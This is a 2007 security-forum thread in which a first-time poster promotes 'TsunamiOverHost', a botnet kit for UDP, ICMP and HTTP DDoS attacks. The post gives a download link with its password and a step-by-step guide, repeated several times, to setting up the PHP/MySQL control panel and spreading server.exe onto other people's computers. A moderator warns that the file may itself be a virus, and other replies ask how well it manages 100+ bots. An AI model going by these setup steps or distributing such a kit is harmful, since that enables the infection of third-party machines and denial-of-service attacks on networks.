Waraxe IT Security Portal
Login or Register
July 27, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 172
Members: 0
Total: 172
Full disclosure
CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other software -> [Botnet] TsunamiOverHost
Post new topicReply to topic View previous topic :: View next topic
[Botnet] TsunamiOverHost
PostPosted: Fri Sep 14, 2007 1:42 pm Reply with quote
Pyzio
Beginner
Beginner
Joined: Sep 13, 2007
Posts: 1




Quote:
0001B95C 00 00 00 00 47 65 74 4B 65 79 62 6F 61 72 64 54 ????GetKeyboardT
0001B96C 79 70 65 00 00 00 52 65 67 51 75 65 72 79 56 61 ype???RegQueryVa
0001B97C 6C 75 65 45 78 41 00 00 00 53 79 73 46 72 65 65 lueExA???SysFree
0001B98C 53 74 72 69 6E 67 00 00 00 57 53 41 43 6C 65 61 String???WSAClea
0001B99C 6E 75 70 00 00 00 49 63 6D 70 53 65 6E 64 45 63 nup???IcmpSendEc
0001B9AC 68 6F 00 00 00 53 48 47 65 74 53 70 65 63 69 61 ho???SHGetSpecia
0001B9BC 6C 46 6F 6C 64 65 72 50 61 74 68 41 00 00 00 00 lFolderPathA????


That may do some of things is said to do .. But also maybe a keylogger .. SO if that is just another DDOS tools .. maybe keyboard is not need either..

I removed the file from here.. If anyone has a different idea let me know

I have found a new nice tool!


Code:

http://#############################33
password: tsunamirlz


With this tool you can create own botnet and attack in 3 types of attacks:
-UDP
-ICMP
-HTTP

It works! I created botnet with 2 computers and it ddosed 1mbit connection!
Quote:
Quote:
This paper and the software has been made for educational purposes only, the author will not take any responsibilities of you
using TsunamiOverHost application.

First of all if you want to be successful on using this bot read this how-to carefully.

// Things that you need //

The Program ( TsunamiOverHost.exe, 4 files in one folder which will be : index.php, online.php, update.php, and update.txt )

A Host ( you will only need ~10KB )

MySQL ( a database in which you'll create a special "botnet" table )

// Uploading //

Ok, now you know what you need, and what you should have, lets get to the real business ; - )

1. Create a folder.
2. Copy index.php, online.php, update.php, update.txt.
3. Paste it to the folder that you made.
4. Open index.php with some text editor, and where it says :

"SETTINGS FOR ADMIN ACCESS", you gonna put your login and the pass, ex.

$login = "yourLogin";

$password = "yourPassword";

Save.

1. Go to your mysql database.
2. Create a new database.
3. Create a new table, for example open the sql manager and paste this :

CREATE TABLE botnet (
date int NOT NULL,
ip varchar(40) NOT NULL,
b_id int unsigned primary key NOT NULL auto_increment
);

4. Save it.
5. Open your online.php file, and look for :

"Set MySQL database variables" - You will find four variables that you need to fill out.

$online_db_host = "yourHost ( ex . mysql.domain.com )";
$online_db_name = "yourDatabaseName ( ex . haxior )";
$online_db_user = "yourUser ( user for the database ) ";
$online_db_pass = "yourPass ( password to the database )";

Save.

Now in your folder you should have two updated and two old files.

1. Connect to your ftp ( ex . using flashfxp )
2. Copy the folder that you have made to your host.
3. Change the CHMOD's of file update.txt to 777.
4. Disconnect.

After setting everything up, you will open TsunamiOverHost.exe, and give the path to the folder that you just updated to
your ftp. ( ex . domain.com/panel )



This paper and the software has been made for educational purposes only, the author will not take any responsibilities of you
using TsunamiOverHost application.

First of all if you want to be successful on using this bot read this how-to carefully.

// Things that you need //

The Program ( TsunamiOverHost.exe, 4 files in one folder which will be : index.php, online.php, update.php, and update.txt )

A Host ( you will only need ~10KB )

MySQL ( a database in which you'll create a special "botnet" table )

// Uploading //

Ok, now you know what you need, and what you should have, lets get to the real business ; - )

1. Create a folder.
2. Copy index.php, online.php, update.php, update.txt.
3. Paste it to the folder that you made.
4. Open index.php with some text editor, and where it says :

"SETTINGS FOR ADMIN ACCESS", you gonna put your login and the pass, ex.

$login = "yourLogin";

$password = "yourPassword";

Save.

1. Go to your mysql database.
2. Create a new database.
3. Create a new table, for example open the sql manager and paste this :

CREATE TABLE botnet (
date int NOT NULL,
ip varchar(40) NOT NULL,
b_id int unsigned primary key NOT NULL auto_increment
);

4. Save it.
5. Open your online.php file, and look for :

"Set MySQL database variables" - You will find four variables that you need to fill out.

$online_db_host = "yourHost ( ex . mysql.domain.com )";
$online_db_name = "yourDatabaseName ( ex . haxior )";
$online_db_user = "yourUser ( user for the database ) ";
$online_db_pass = "yourPass ( password to the database )";

Save.

Now in your folder you should have two updated and two old files.

1. Connect to your ftp ( ex . using flashfxp )
2. Copy the folder that you have made to your host.
3. Change the CHMOD's of file update.txt to 777.
4. Disconnect.

After setting everything up, you will open TsunamiOverHost.exe, and give the path to the folder that you just updated to
your ftp. ( ex . domain.com/panel )

If everything goes fine, you will find a new file called server.exe. This file will be responsible for the power of the bot,
More people open it = the bot will be more powerfull. In the panel, you will be able to see how many server.exe files are
running on other peoples computers!

Yes! Lets have some fun ; >

1. Go to your panel ( the one you uploaded through ftp, ex. domain.com/panel. )
2. Login.

I don't think i have to explain anything now, but remember the author will not take any responsibilities of the results!



Sry for my english...
If i did mistake, please correct it.
View user's profile Send private message
Re: [Botnet] TsunamiOverHost
PostPosted: Mon Sep 17, 2007 10:18 pm Reply with quote
ToXiC
Moderator
Moderator
Joined: Dec 01, 2004
Posts: 181
Location: Cyprus




Pyzio wrote:
I have found a new nice tool!


Code:

http://rapidshare.com/files/54509389/TsunamiOverHost.rar
password: tsunamirlz


With this tool you can create own botnet and attack in 3 types of attacks:
-UDP
-ICMP
-HTTP

It works! I created botnet with 2 computers and it ddosed 1mbit connection!
Quote:
Quote:
This paper and the software has been made for educational purposes only, the author will not take any responsibilities of you
using TsunamiOverHost application.

First of all if you want to be successful on using this bot read this how-to carefully.

// Things that you need //

The Program ( TsunamiOverHost.exe, 4 files in one folder which will be : index.php, online.php, update.php, and update.txt )

A Host ( you will only need ~10KB )

MySQL ( a database in which you'll create a special "botnet" table )

// Uploading //

Ok, now you know what you need, and what you should have, lets get to the real business ; - )

1. Create a folder.
2. Copy index.php, online.php, update.php, update.txt.
3. Paste it to the folder that you made.
4. Open index.php with some text editor, and where it says :

"SETTINGS FOR ADMIN ACCESS", you gonna put your login and the pass, ex.

$login = "yourLogin";

$password = "yourPassword";

Save.

1. Go to your mysql database.
2. Create a new database.
3. Create a new table, for example open the sql manager and paste this :

CREATE TABLE botnet (
date int NOT NULL,
ip varchar(40) NOT NULL,
b_id int unsigned primary key NOT NULL auto_increment
);

4. Save it.
5. Open your online.php file, and look for :

"Set MySQL database variables" - You will find four variables that you need to fill out.

$online_db_host = "yourHost ( ex . mysql.domain.com )";
$online_db_name = "yourDatabaseName ( ex . haxior )";
$online_db_user = "yourUser ( user for the database ) ";
$online_db_pass = "yourPass ( password to the database )";

Save.

Now in your folder you should have two updated and two old files.

1. Connect to your ftp ( ex . using flashfxp )
2. Copy the folder that you have made to your host.
3. Change the CHMOD's of file update.txt to 777.
4. Disconnect.

After setting everything up, you will open TsunamiOverHost.exe, and give the path to the folder that you just updated to
your ftp. ( ex . domain.com/panel )



This paper and the software has been made for educational purposes only, the author will not take any responsibilities of you
using TsunamiOverHost application.

First of all if you want to be successful on using this bot read this how-to carefully.

// Things that you need //

The Program ( TsunamiOverHost.exe, 4 files in one folder which will be : index.php, online.php, update.php, and update.txt )

A Host ( you will only need ~10KB )

MySQL ( a database in which you'll create a special "botnet" table )

// Uploading //

Ok, now you know what you need, and what you should have, lets get to the real business ; - )

1. Create a folder.
2. Copy index.php, online.php, update.php, update.txt.
3. Paste it to the folder that you made.
4. Open index.php with some text editor, and where it says :

"SETTINGS FOR ADMIN ACCESS", you gonna put your login and the pass, ex.

$login = "yourLogin";

$password = "yourPassword";

Save.

1. Go to your mysql database.
2. Create a new database.
3. Create a new table, for example open the sql manager and paste this :

CREATE TABLE botnet (
date int NOT NULL,
ip varchar(40) NOT NULL,
b_id int unsigned primary key NOT NULL auto_increment
);

4. Save it.
5. Open your online.php file, and look for :

"Set MySQL database variables" - You will find four variables that you need to fill out.

$online_db_host = "yourHost ( ex . mysql.domain.com )";
$online_db_name = "yourDatabaseName ( ex . haxior )";
$online_db_user = "yourUser ( user for the database ) ";
$online_db_pass = "yourPass ( password to the database )";

Save.

Now in your folder you should have two updated and two old files.

1. Connect to your ftp ( ex . using flashfxp )
2. Copy the folder that you have made to your host.
3. Change the CHMOD's of file update.txt to 777.
4. Disconnect.

After setting everything up, you will open TsunamiOverHost.exe, and give the path to the folder that you just updated to
your ftp. ( ex . domain.com/panel )

If everything goes fine, you will find a new file called server.exe. This file will be responsible for the power of the bot,
More people open it = the bot will be more powerfull. In the panel, you will be able to see how many server.exe files are
running on other peoples computers!

Yes! Lets have some fun ; >

1. Go to your panel ( the one you uploaded through ftp, ex. domain.com/panel. )
2. Login.

I don't think i have to explain anything now, but remember the author will not take any responsibilities of the results!



Sry for my english...
If i did mistake, please correct it.


i would feel more confident if i the source of tsunami exe file was published also..
I didnt try it .. but .. it seems that is a virus .. for the following reasons.

1)The guy that post this .. Didnt make any other posts .. This is his first one.

2) If he was really interested in giving that out he could share the source of the exe file also ..

BE ALERTED PEOPLE FOR THAT FILE ..

( i wont delete the post but please be alerted. ) anyone who is gonna try it post your comments here..

_________________
who|grep -i blonde|talk; cd~;wine;talk;touch;unzip;touch; strip;gasp;finger;gasp;mount; fsck; more; yes; gasp; umount; make clean; sleep;wakeup;goto http://www.md5this.com
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Wed Sep 19, 2007 11:30 pm Reply with quote
wilman_berserker
Beginner
Beginner
Joined: Sep 20, 2007
Posts: 1




this is the first botkit I found worth anything and for free on the internet. How well does this manage 100+ computers? is there any lag when manageing your bots?
View user's profile Send private message
PostPosted: Fri Sep 21, 2007 3:48 am Reply with quote
drag
Active user
Active user
Joined: May 31, 2007
Posts: 25




Seems fishy... The guy who posted the above post also has only posted once? Could be the same guy....
View user's profile Send private message
[Botnet] TsunamiOverHost
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.343 Seconds